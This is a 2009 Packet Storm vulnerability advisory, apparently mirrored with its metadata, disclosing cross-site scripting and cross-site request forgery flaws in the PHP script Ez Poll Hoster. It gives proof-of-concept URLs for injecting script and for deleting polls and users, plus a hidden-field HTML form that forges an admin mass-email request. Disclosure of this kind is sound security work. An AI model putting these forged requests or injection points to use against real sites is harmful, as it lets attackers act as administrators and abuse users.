Search...

Ez Poll Hoster XSS / XSRF

2009-12-15T00:00:00

ID PACKETSTORM:83837
Type packetstorm
Reporter Milos Zivanovic
Modified 2009-12-15T00:00:00

Description

                                        
                                            `[#-----------------------------------------------------------------------------------------------#]  
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities  
[#] Author: Milos Zivanovic  
[#] Email: milosz.security[at]gmail.com  
[#] Date: 14. December 2009.  
[#-----------------------------------------------------------------------------------------------#]  
[#] Application: Ez Poll Hoster  
[#] Version: the only one there is  
[#] Platform: PHP  
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206  
[#] Price: 15 USD  
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities  
[#-----------------------------------------------------------------------------------------------#]  
  
[#]Content  
|--User panel  
| |--XSS in user panel  
| |--Delete poll by name  
|  
|--Admin panel  
|--XSS in admin panel  
|--Delete user by name  
|--Email all users  
  
[#]User panel  
  
[-]XSS in user panel  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/eph/index.php?action=code&pid=[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]Delete poll by name  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/eph/index.php?action=delete_poll&pid=[POLL  
NAME]&do=true&is_js_confirmed=1  
[POC----------------------------------------------------------------------------------------------]  
  
[#]Admin panel  
  
[-]XSS in admin panel  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/eph/profile.php?action=view&uid=[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]Delete user by name  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER  
NAME]&is_js_confirmed=1  
[POC----------------------------------------------------------------------------------------------]  
  
[-]Email all users  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
&lt;form action="http://localhost/eph/admin.php?action=email&do=true"  
method="post"&gt;  
&lt;input type="hidden" name="subject" value="this is my subject"&gt;  
&lt;input type="hidden" name="message" value="this is my message"&gt;  
&lt;input type="submit" name="submit" value="Submit"&gt;  
&lt;/form&gt;  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[#] EOF  
`

JSON Vulners Source

Initial Source

{"hash": "2a9414b1aacd20ed7476cdbe59925dfd5fe3e6eedd06b290618a108615e08019", "sourceHref": "https://packetstormsecurity.com/files/download/83837/ezpollhoster-xssxsrf.txt", "title": "Ez Poll Hoster XSS / XSRF", "id": "PACKETSTORM:83837", "published": "2009-12-15T00:00:00", "description": "", "modified": "2009-12-15T00:00:00", "sourceData": "`[#-----------------------------------------------------------------------------------------------#] \n[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities \n[#] Author: Milos Zivanovic \n[#] Email: milosz.security[at]gmail.com \n[#] Date: 14. December 2009. \n[#-----------------------------------------------------------------------------------------------#] \n[#] Application: Ez Poll Hoster \n[#] Version: the only one there is \n[#] Platform: PHP \n[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206 \n[#] Price: 15 USD \n[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities \n[#-----------------------------------------------------------------------------------------------#] \n \n[#]Content \n|--User panel \n| |--XSS in user panel \n| |--Delete poll by name \n| \n|--Admin panel \n|--XSS in admin panel \n|--Delete user by name \n|--Email all users \n \n[#]User panel \n \n[-]XSS in user panel \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=code&pid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete poll by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=delete_poll&pid=[POLL \nNAME]&do=true&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[#]Admin panel \n \n[-]XSS in admin panel \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/profile.php?action=view&uid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete user by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/admin.php?action=manage&do=delete&uid=[USER \nNAME]&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Email all users \n \n[EXPLOIT------------------------------------------------------------------------------------------] \n<form action=\"http://localhost/eph/admin.php?action=email&do=true\" \nmethod=\"post\"> \n<input type=\"hidden\" name=\"subject\" value=\"this is my subject\"> \n<input type=\"hidden\" name=\"message\" value=\"this is my message\"> \n<input type=\"submit\" name=\"submit\" value=\"Submit\"> \n</form> \n[EXPLOIT------------------------------------------------------------------------------------------] \n \n[#] EOF \n`\n", "reporter": "Milos Zivanovic", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "4af274d08f15c98585f5a08321b588e1"}, {"key": "modified", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "96dc648bb9b9a8a479174bc4d75e80eb"}, {"key": "sourceData", "hash": "469dcc1e2cd438dee1603c6374c8857e"}, {"key": "sourceHref", "hash": "05ccdc20e043ff13387f14500de86a8d"}, {"key": "title", "hash": "4dea689e1a81b86cd04123d4f7d45c7f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/83837/Ez-Poll-Hoster-XSS-XSRF.html", "lastseen": "2016-11-03T10:27:00", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}